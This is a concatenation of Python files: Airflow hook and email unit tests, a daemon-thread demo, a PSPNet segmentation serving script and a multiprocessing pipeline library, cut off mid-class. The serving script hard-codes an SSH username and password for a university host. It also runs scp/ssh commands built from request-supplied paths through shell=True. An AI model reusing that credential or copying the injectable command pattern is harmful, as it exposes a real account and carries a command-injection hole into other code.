assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
daemon_thread.py
|
#!/usr/bin/env python3
""" Barron finishes cooking while Olivia cleans """
import threading
import time
def kitchen_cleaner():
while True:
print('Olivia cleaned the kitchen.')
time.sleep(1)
if __name__ == '__main__':
olivia = threading.Thread(target=kitchen_cleaner)
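    # Mark the thread as a daemon so it is killed automatically when the main
    # thread (Barron) finishes; otherwise the infinite kitchen_cleaner loop
    # would keep the program alive forever.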
olivia.daemon = True
olivia.start()
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is done!')
|
pspnet_serving.py
|
from __future__ import print_function
from __future__ import division
import time
import os
import subprocess
from os.path import splitext, join, isfile, basename
from os import environ
from math import ceil
import argparse
import numpy as np
from scipy import misc, ndimage
import pre_process
import deeplearning
import img_combine2
from psp_tf.pspnet import PSPNet50
from socketIO_client import SocketIO, LoggingNamespace, BaseNamespace
from async_socketIO import async_socketIO
from collections import namedtuple
import sshtunnel
import pysftp
import utils
import uuid
import json
import tqdm
import multiprocessing
from multiprocessing import Queue, Lock
import logging
# init tensorflow
from keras.backend.tensorflow_backend import set_session
from keras import backend as K
import tensorflow as tf
# init global lock
mutex = Lock()
mutex1 = Queue(1)
mutex2 = Queue(1)
mutex_data = None
# end init global lock
class task():
"""
mainthread:
        True  : run() must be driven from the main thread to provide the service
        False : a worker process is created automatically to provide the service
    handler_type:
        "file"  : a file is used to transfer status and arguments
        "queue" : a built-in queue is used to transfer status and arguments
"""
mainthread = False
handler_type = 'None'
def prepare(self):
"""
        Called to initialize per-task state before run() is used.
"""
self.remote_uuid = "{0}{1}".format(uuid.uuid4(), "_deeplearning")
self.socketIO = SocketIO('localhost', 30091, LoggingNamespace)
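# Illustrative sketch (not part of the original service): a minimal subclass
# that follows the contract documented on `task` above. mainthread = True means
# main() below is expected to drive run() from its polling loop; the queue
# attribute names mirror those of the real tasks that follow. This class is
# never instantiated or added to the `tasks` list.
class _example_echo_task(task):
    mainthread = True
    handler_type = 'Queue'
    def prepare(self):
        task.prepare(self)
        self.requestQueue = multiprocessing.Queue()
        self.responseQueue = multiprocessing.Queue()
    def run(self):
        # take one request and immediately acknowledge it, so that an
        # ask_and_wait-style caller blocking on responseQueue can unblock
        args_d = self.requestQueue.get()
        self.responseQueue.put(args_d['local_id'])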
class pspnet_pre(task):
handler_type = "Process"
handle = ""
mainthread = False
def prepare(self):
task.prepare(self)
def deploy(self):
pass
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
print(local_id)
args_d['local_id'] = local_id
p = multiprocessing.Process(
target=self.run, args=(json.dumps(args_d), ))
p.start()
p.join()
def run(self, args_s):
args_d = json.loads(args_s)
iname = args_d['panid']
self.socketIO.emit('update', {'id': iname, "phase": 1, 'val': -1, 'max': -1})
self.socketIO.wait(seconds=1)
print("{0} start pre".format(args_d['local_id']))
pre_process.pre_process(
namedtuple('Struct', args_d.keys())(*args_d.values()))
class pspnet_img_combine(task):
handler_type = "Queue"
handle = ""
mainthread = False
def prepare(self):
task.prepare(self)
self.requestQueue = multiprocessing.Queue()
self.responseQueue = multiprocessing.Queue()
def deploy(self):
pass
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
args_d['local_id'] = local_id
p = multiprocessing.Process(
target=self.run, args=(json.dumps(args_d), ))
p.start()
p.join()
def run(self, args_s=""):
args_d = json.loads(args_s)
iname = args_d['panid']
ext = args_d['ext']
filename = args_d['filename']
self.socketIO.emit('update', {'id': iname, "phase": 3, 'val': -1, 'max': -1})
self.socketIO.wait(seconds=1)
class_scores = img_combine2.img_combine2(
namedtuple('Struct', args_d.keys())(*args_d.values()))
print("blended...")
        img = misc.imread("./{0}{1}".format(iname, ext))
img = misc.imresize(img, 10)
class_image = np.argmax(class_scores, axis=2)
pm = np.max(class_scores, axis=2)
colored_class_image = utils.color_class_image(class_image,
args_d['model'])
        # colored_class_image is in [0.0, 1.0]; img is in [0, 255]
alpha_blended = 0.5 * colored_class_image + 0.5 * img
        misc.imsave(iname + "_seg_blended" + ext, alpha_blended)
# for filename in tqdm.tqdm(os.listdir('/tmp')):
# if filename.endswith(".npy"):
# try:
# os.remove(filename)
# except Exception:
# pass
self.socketIO.emit('update', {'id': iname, "phase": 3, 'val': 1, 'max': 1})
self.socketIO.wait(seconds=1)
self.responseQueue.put(args_d['local_id'])
class pspnet_dl(task):
mainthread = True
handler_type = 'Queue'
handler = ""
def prepare(self):
task.prepare(self)
self.requestQueue = multiprocessing.Queue()
self.responseQueue = multiprocessing.Queue()
self.mutex = multiprocessing.Lock()
config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# config.gpu_options.per_process_gpu_memory_fraction = 0.4
self.sess = tf.Session(config=config)
set_session(self.sess)
self.pspnet = PSPNet50(
nb_classes=150,
input_shape=(473, 473),
weights="pspnet50_ade20k",
path="./pspnet/weights")
# end
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
args_d['local_id'] = local_id
self.requestQueue.put(args_d)
while (1):
p = self.responseQueue.get()
if p == local_id:
break
self.responseQueue.put(p)
def run(self):
# print("waiting for task")
# try:
args_d = self.requestQueue.get()
args_d['sess'] = self.sess
args_d['model_ok'] = self.pspnet
args_d['remote_uuid'] = self.remote_uuid
args_d['socketIO'] = self.socketIO
global_arg = namedtuple('Struct', args_d.keys())(*args_d.values())
deeplearning.deep_process(global_arg)
self.responseQueue.put(args_d['local_id'])
time.sleep(1)
pspnet_dl_in = pspnet_dl()
pspnet_pre_in = pspnet_pre()
pspnet_img_combine_in = pspnet_img_combine()
tasks = [pspnet_pre_in, pspnet_dl_in, pspnet_img_combine_in]
# config
config_p1_folder = '/dev/shm/guxi/p1'
config_p2_folder = '/dev/shm/guxi/p2'
config_p3_folder = '/dev/shm/guxi/p3'
# init remote link
data = {
"proxy": {
"host": "star.eecs.oregonstate.edu",
"username": "guxi",
"password": "cft6&UJM",
"port": 22,
},
}
def ftunnel(*args):
client = args[-1]
if type(client) == dict:
client = namedtuple('Struct', client.keys())(*client.values())
cmd = "ssh -NR {0}:{1}:{2} {3}@{4} -p {5} >/dev/null".format(
args[0], args[1], args[2], client.username, client.host, client.port)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
def scp_download(port, user, host, path):
cmd = "scp -P {0} {1}@{2}:{3} ./".format(port, user, host, path)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
def scp_upload(port, user, host, path, file):
cmd = "scp -P {0} ./{4} {1}@{2}:{3} ".format(port, user, host, path, file)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
mutex_ssh = multiprocessing.Lock()
def sshdownload(data):
global mutex_ssh
mutex_ssh.acquire()
#start tunnel
# tunnel_p = multiprocessing.Process(
# target=ftunnel,
# args=(50033, data['ssh']['host'], data['ssh']['port'], data['proxy']))
# tunnel_p.start()
#do scp_download
print("downloading {0}...".format(data['input_path']))
scp_download(data['ssh']['port'], data['ssh']['username'], "127.0.0.1",
data['input_path'])
# p.terminate()
mutex_ssh.release()
def sshupload(data, path):
global mutex_ssh
mutex_ssh.acquire()
#start tunnel
# tunnel_p = multiprocessing.Process(
# target=ftunnel,
# args=(50033, data['ssh']['host'], data['ssh']['port'], data['proxy']))
# tunnel_p.start()
#do scp_download
print("uploading {0}...".format(data['input_path']))
scp_upload(data['ssh']['port'], data['ssh']['username'], "127.0.0.1",
data["output_path"], path)
# p.terminate()
mutex_ssh.release()
def task_process(args, sio):
print("got request")
data = args[0]
filename, ext = splitext(data['input_path'])
panid = basename(filename)
# download file from upper server
print("download...")
sshdownload(data)
args_d = {}
args_d['panid'] = panid
args_d['filename'] = filename
args_d['ext'] = ext
args_d['model'] = "pspnet50_ade20k"
args_d['sliding'] = True
args_d['flip'] = True
args_d['multi_scale'] = True
print("phase 1...")
args_d['input_path'] = "./{0}{1}".format(panid, ext)
args_d['output_path'] = "{2}/{0}{1}".format(panid, ext, config_p1_folder)
pspnet_pre_in.ask_and_wait(args_d=args_d)
print("phase 2...")
# args_d['sess']=sess
# args_d['model_ok']=pspnet
args_d['input_path'] = config_p1_folder + '/'
args_d['input_path_filter'] = panid
args_d['output_path'] = config_p2_folder + '/'
pspnet_dl_in.ask_and_wait(args_d)
print("phase 3...")
args_d['input_path'] = "./{0}{1}".format(panid, ext)
args_d['input_path2'] = "{2}/{0}{1}".format(panid, ext, config_p2_folder)
args_d['output_path'] = "{2}/{0}{1}".format(panid, ext, config_p3_folder)
pspnet_img_combine_in.ask_and_wait(args_d)
print("upload...")
sshupload(data, panid + "_seg_blended" + ext)
print("garbage cleaning")
print("success")
sio.emit("next", data)
# global data storage
class Pspnet_namespace(BaseNamespace):
def on_asknext(self, *args):
self.emit("next", None)
def on_request(self, *args):
p = multiprocessing.Process(target=task_process, args=(args, self))
p.start()
def main():
if os.path.exists("temp_arg.json"):
os.remove("temp_arg.json")
for task in tasks:
task.prepare()
asio = async_socketIO(SocketIO('localhost', 30041))
    sio_pspnet_info = asio.socketIO.define(Pspnet_namespace, '/pspnet')
asio.background()
while (1):
for task in tasks:
if task.mainthread:
task.run()
#mutex2.put("success",block=True)
#except:
# pass
if __name__ == "__main__":
main()
|
pipeline.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ctypes
import inspect
from multiprocessing import Queue, Process, Value
import logging
import collections
from threading import Thread
import time
import traceback
from counter import AtomicCounter
def _get_logger(name):
logger = logging.getLogger(name)
logger.addHandler(logging.NullHandler())
return logger
def create_process_with(process_alias=None, target_func=None, daemon=True, **kwargs):
process = Process(name=process_alias, target=target_func, kwargs=kwargs)
process.daemon = daemon
return process
def func_to_be_invoked_with_new_process(target_pipe=None, pipeline_running_status=None):
target_pipe.info("start a process")
target_pipe.open(pipeline_running_status=pipeline_running_status)
target_pipe.info("end a process")
return
class Pipeline:
END_OF_STREAM_SIGNAL = "!end_of_stream!"
RUNNING_STATUS_STANDBY = 0
RUNNING_STATUS_RUNNING = 1
RUNNING_STATUS_FINISH = 2
RUNNING_STATUS_INTERRUPTED = -999
@staticmethod
def is_end_of_stream(data):
return data == Pipeline.END_OF_STREAM_SIGNAL
def __init__(self, alias=None):
self.logger = _get_logger(__name__)
self._alias = alias
self._pipe_builders = []
self._pipes = {}
self._pipe_processes = []
self._first_pipe = None
self._last_pipe = None
self._func_read_stream = (lambda: range(0))
self._cleanups = []
self._already_cleanup = Value(ctypes.c_bool, False)
self._running_status = Value(ctypes.c_int, Pipeline.RUNNING_STATUS_STANDBY)
self._interrupted_by_exception = False
self._thread_watching_running_status = None
self._thread_watching_remaining_processes = None
self._stream_reader_process = None
def reset(self):
self._pipes = {}
self._pipe_processes = []
self._first_pipe = None
self._last_pipe = None
self._func_read_stream = (lambda: range(0))
self._cleanups = []
self._already_cleanup = Value(ctypes.c_bool, False)
self._running_status = Value(ctypes.c_int, Pipeline.RUNNING_STATUS_STANDBY)
self._interrupted_by_exception = False
self._thread_watching_running_status = None
self._thread_watching_remaining_processes = None
self._stream_reader_process = None
def add(self, builder):
"""
        :param builder: PipeBuilder describing the next pipe in the chain
        :return: Pipeline (self, for chaining)
"""
self._pipe_builders.append(builder)
return self
def stream(self, generator=None):
"""
start to stream data from generator into pipeline, yielding data passed through pipeline
:param generator: Iterable or Generator implementation
:return:
"""
self._check_if_runnable()
try:
# change running status
self._mark_started()
# determine stream generator
self._configure_stream_reader(generator)
# configure pipes and create processes for them
self._configure_pipes()
# open pipes in a new process respectably
self._open_pipes()
# start process reading stream from generator
self._start_streaming_data()
# yield data passed through this pipeline
self.logger.info("start to yield streams passed through pipeline...")
while True:
message = self._last_pipe.outbound.get()
if Pipeline.is_end_of_stream(message):
break
yield message
self.logger.info("finished yielding streams passed through pipeline")
# if interrupted
if self._interrupted_by_exception:
raise Exception("processing was interrupted by unexpected exception")
self.logger.info("finished successfully")
finally:
self._cleanup()
def _mark_started(self):
self.set_running_status_to_running()
self._add_running_status_reset_func_to_cleanup()
self._configure_running_status_watcher()
def _add_running_status_reset_func_to_cleanup(self):
def cleanup_func_reset_running_status():
with self._running_status.get_lock():
if self.running_status != Pipeline.RUNNING_STATUS_INTERRUPTED:
self.set_running_status_to_finish()
self._add_cleanup_func("reset running status of pipeline",
cleanup_func_reset_running_status)
def _configure_running_status_watcher(self):
def watch_running_status(pipeline=None):
pipeline.logger.info("start thread watching running status...")
while True:
if pipeline.running_status == Pipeline.RUNNING_STATUS_INTERRUPTED:
pipeline.logger.error("got an interruption, stops pipeline, see logs")
pipeline._interrupted_by_exception = True
pipeline.stop_force()
pipeline.set_running_status_to_finish()
break
elif pipeline.running_status == Pipeline.RUNNING_STATUS_FINISH:
break
time.sleep(0.001)
pipeline.logger.info("stop thread watching running status")
self._thread_watching_running_status = Thread(
name="running_status_watcher",
target=watch_running_status,
kwargs={"pipeline": self})
self._thread_watching_running_status.daemon = True
self._thread_watching_running_status.start()
def _start_streaming_data(self):
self.logger.info("start process for streaming data into pipeline...")
self._add_cleanup_func("terminate the stream reader process",
lambda: self._stream_reader_process.terminate())
self._stream_reader_process.start()
def _open_pipes(self):
self.logger.info("start Processes for pipes(%s)...", len(self._pipe_processes))
map(lambda process: process.start(),
reduce(lambda p_group1, p_group2: p_group1 + p_group2, self._pipe_processes, []))
self._add_cleanup_func("terminate all the pipe processes",
lambda: map(lambda each_p: each_p.terminate(),
reduce(lambda p1, p2: p1 + p2, self._pipe_processes, [])))
def _configure_stream_reader(self, generator):
if isinstance(generator, DataGenerator):
self._func_read_stream = generator.produce
elif isinstance(generator, collections.Iterable):
self._func_read_stream = (lambda: generator)
elif inspect.isgeneratorfunction(generator):
self._func_read_stream = generator
else:
raise Exception("generator should be either Producer or Iterable")
self._stream_reader_process = create_process_with(
process_alias="stream_reader",
target_func=lambda: self._read_and_stream_from_generator())
def _check_if_runnable(self):
# check running status
if self.running_status != Pipeline.RUNNING_STATUS_STANDBY:
raise Exception("invalid running status. Call reset() before call this")
def _configure_pipes(self):
if self._pipe_builders is None or len(self._pipe_builders) <= 0:
raise Exception("There are no pipes to stream data")
# chaining pipes
pipes = []
pipe_outbound = Queue()
self._pipe_builders.reverse()
for builder in self._pipe_builders:
pipe = builder.build()
pipe.outbound = pipe_outbound
pipes.append(pipe)
pipe_outbound = pipe.inbound
self._pipe_builders.reverse()
pipes.reverse()
self._pipes = pipes
# capture entry and terminal
self._first_pipe = self._pipes[0]
self._last_pipe = self._pipes[-1]
processes = []
for pipe in self._pipes:
processes_for_pipe = map(lambda i: create_process_with(process_alias="process-%s-%s" % (pipe.alias, i),
target_func=func_to_be_invoked_with_new_process,
target_pipe=pipe,
pipeline_running_status=self._running_status),
range(pipe.number_of_consumer))
processes.append(processes_for_pipe)
self._pipe_processes = processes
def _read_and_stream_from_generator(self):
try:
map(lambda m: self.__stream_data(m), self._func_read_stream())
self.__stream_data(Pipeline.END_OF_STREAM_SIGNAL)
except Exception as e:
self.logger.error("while reading stream from generator, an unexpected exception occurred, stopping pipeline. "
"see cause -> %s\n%s", e, traceback.format_exc())
self.set_running_status_to_interrupted()
def __stream_data(self, data):
self._first_pipe.inbound.put(data)
def _join_pipes(self):
def watch_remaining_processes(pipeline=None, processes=None):
pipeline.logger.info("start thread watching pipe processes remaining...")
while True:
processes_alive = filter(lambda p: p.is_alive(), reduce(lambda plist1, plist2: plist1 + plist2, processes, []))
if len(processes_alive) <= 0:
pipeline.logger.info("no remaining processes")
break
else:
pipeline.logger.info("%s remaining processes : %s", len(processes_alive),
map(lambda p: (p.pid, p.name), processes_alive))
time.sleep(5)
pipeline.logger.info("stop thread watching pipe processes remaining")
self._thread_watching_remaining_processes = Thread(
name="remaining_processes_watcher",
target=watch_remaining_processes,
kwargs={"pipeline": self,
"processes": self._pipe_processes}
)
self._thread_watching_remaining_processes.daemon = True
self._thread_watching_remaining_processes.start()
map(lambda p:
self.logger.info("joining(waiting) the process(name:%s, id:%s, alive:%s)...", p.name, p.pid, p.is_alive())
or p.join()
or self.logger.info("released joining the process(name:%s, id:%s, alive:%s)", p.name, p.pid, p.is_alive()),
reduce(lambda plist1, plist2: plist1 + plist2, self._pipe_processes, []))
self._thread_watching_remaining_processes.join()
def _add_cleanup_func(self, desc="", func=(lambda: None)):
"""
        Register a named cleanup function to be invoked later by _cleanup().
"""
self._cleanups.append((desc, func))
def _cleanup(self):
with self._already_cleanup.get_lock():
if self._already_cleanup.value:
return
self.logger.info("start cleaning up...")
map(lambda cleanup_tuple:
self.logger.info("call cleanup func -> %s", cleanup_tuple[0])
or cleanup_tuple[1](),
self._cleanups)
self.logger.info("finished cleaning up")
self._already_cleanup.value = True
def stop_force(self):
"""
terminate all spawned processes
:return: void
"""
# call registered cleanups
self._cleanup()
# send end signal to terminal queue for pipeline
self._last_pipe.outbound.put(Pipeline.END_OF_STREAM_SIGNAL)
@property
def running_status(self):
return self._running_status.value
def set_running_status_to_standby(self):
self._set_running_status(Pipeline.RUNNING_STATUS_STANDBY)
def set_running_status_to_running(self):
self._set_running_status(Pipeline.RUNNING_STATUS_RUNNING)
def set_running_status_to_finish(self):
self._set_running_status(Pipeline.RUNNING_STATUS_FINISH)
def set_running_status_to_interrupted(self):
self._set_running_status(Pipeline.RUNNING_STATUS_INTERRUPTED)
def _set_running_status(self, value):
with self._running_status.get_lock():
self._running_status.value = value
class Pipe(object):
def __init__(self, alias=None,
consumer=None,
buffer_size=0,
number_of_consumer=1,
skip_on_error=False,
inbound_counter=None,
outbound_counter=None,
consumer_exception_handler=None,
**kwargs):
self._alias = alias
self._logger = _get_logger(__name__)
self._buffer_size = buffer_size
self._consumer = consumer
self._number_of_consumer = number_of_consumer
self._active_consumer_counter = AtomicCounter()
self._skip_on_error = skip_on_error
self._inbound_counter = inbound_counter if inbound_counter is not None else AtomicCounter()
self._outbound_counter = outbound_counter if outbound_counter is not None else AtomicCounter()
self._inbound = Queue(self._buffer_size)
self._outbound = None
self._consumer_exception_handler = consumer_exception_handler
self._additional_properties = kwargs
def open(self, pipeline_running_status=None):
with self._active_consumer_counter.lock:
self._active_consumer_counter.increase()
self.info("open consumer, %s of %s consumer(s)", self._active_consumer_counter.value,
self._number_of_consumer)
try:
map(
lambda message: self._downstream(message),
self._read_consume_yield(self._read_from_stream)
)
except Exception as e:
self._handle_exception(exception=e, pipeline_running_status=pipeline_running_status)
with self._active_consumer_counter.lock:
self._active_consumer_counter.decrease()
self.info("close consumer, %s consumer(s) remaining", self._active_consumer_counter.value)
def _read_from_stream(self):
message = self._inbound.get()
self.debug("<< %s", message)
if Pipeline.is_end_of_stream(message):
self.info("<< %s", message)
with self._active_consumer_counter.lock:
if self._active_consumer_counter.value > 1:
# re-product end of stream signal for other sibling pipe processes
self._inbound.put(message)
else:
self._inbound_counter.increase()
return message
def _downstream(self, message=None):
"""
        pass messages to the next pipe.
        Note that only the last remaining consumer of a pipe forwards the end-of-stream signal to the next pipe.
        :param message: data processed in this pipe
"""
if not Pipeline.is_end_of_stream(message):
self._outbound_counter.increase()
if self._outbound is None:
return
if Pipeline.is_end_of_stream(message):
# if and only if current pipe process is the last one remaining, send end-of-stream signal downstream.
with self._active_consumer_counter.lock:
if self._active_consumer_counter.value <= 1:
self._outbound.put(message)
self.info(">> %s", message)
else:
self._outbound.put(message)
self.debug(">> %s", message)
def _read_consume_yield(self, func_read_from_upstream):
return []
def _handle_consumer_exception(self, consumer_exception, message):
if self._consumer_exception_handler is None:
return False
try:
self._consumer_exception_handler(consumer_exception, message)
return True
except Exception as e:
self.warn("failed to invoke a consumer exception handler with a consumer exception. see cause -> %s", e.message)
return False
def _handle_exception(self, exception=None, pipeline_running_status=None):
with pipeline_running_status.get_lock():
if pipeline_running_status.value == Pipeline.RUNNING_STATUS_INTERRUPTED:
return
else:
pipeline_running_status.value = Pipeline.RUNNING_STATUS_INTERRUPTED
self.error("when processing data stream on pipeline, an unexpected exception has occurred. "
"This will cause this pipeline to stop. see cause -> %s\n%s",
exception,
traceback.format_exc())
def debug(self, message, *args, **kwargs):
self._log(logging.DEBUG, message, *args, **kwargs)
def info(self, message, *args, **kwargs):
self._log(logging.INFO, message, *args, **kwargs)
def warn(self, message, *args, **kwargs):
self._log(logging.WARNING, message, *args, **kwargs)
def error(self, message, *args, **kwargs):
self._log(logging.ERROR, message, *args, **kwargs)
def _log(self, level, message, *args, **kwargs):
self._logger.log(level, message, *args, **kwargs)
@property
def alias(self):
return self._alias
@property
def inbound(self):
return self._inbound
@property
def outbound(self):
return self._outbound
@outbound.setter
def outbound(self, outbound):
self._outbound = outbound
@property
def number_of_consumer(self):
return self._number_of_consumer
@property
def skip_on_error(self):
return self._skip_on_error
@property
def additional_properties(self):
return self._additional_properties
def inbound_count(self):
return self._inbound_counter.value
def outbound_count(self):
return self._outbound_counter.value
class DefaultPipe(Pipe):
def __init__(self,
alias=None,
consumer=None,
number_of_consumer=1,
skip_on_error=False,
buffer_size=0,
consumer_exception_handler=None,
aggregation_size=1
):
super(DefaultPipe, self).__init__(alias=alias, consumer=consumer, number_of_consumer=number_of_consumer,
skip_on_error=skip_on_error, buffer_size=buffer_size,
consumer_exception_handler=consumer_exception_handler)
self._aggregation_size = aggregation_size
self._aggregation_buffer = []
self._aggregation_count = 0
def _read_consume_yield(self, read_one_from_stream):
while True:
message = read_one_from_stream()
# check end of stream
if Pipeline.is_end_of_stream(message):
# flush aggregation buffer
if self._aggregation_size > 1 and self._aggregation_count >= 1:
yield self._aggregation_buffer
self._aggregation_count = 0
self._aggregation_buffer = []
# stream end of stream signal downstream
yield message
break
# delegate message to consumer
processed_message = message
if self._consumer is not None:
try:
processed_message = self._consumer.consume(message) if isinstance(self._consumer, Consumer) else self._consumer(message)
self.debug("processed %s to %s", message, processed_message)
except Exception as e:
handled = self._handle_consumer_exception(e, message)
if self._skip_on_error:
if not handled:
self.warn("failed to consume a message(%s). see cause -> %s ", message, e)
else:
raise ConsumerException(message="failed to consume message",
cause=e,
data=message,
stacktrace=traceback.format_exc())
if processed_message is None:
continue
# emit downstream
if self._aggregation_size <= 1:
yield processed_message
continue
self._aggregation_count += 1
self._aggregation_buffer.append(processed_message)
if self._aggregation_count >= self._aggregation_size:
yield self._aggregation_buffer
self._aggregation_count = 0
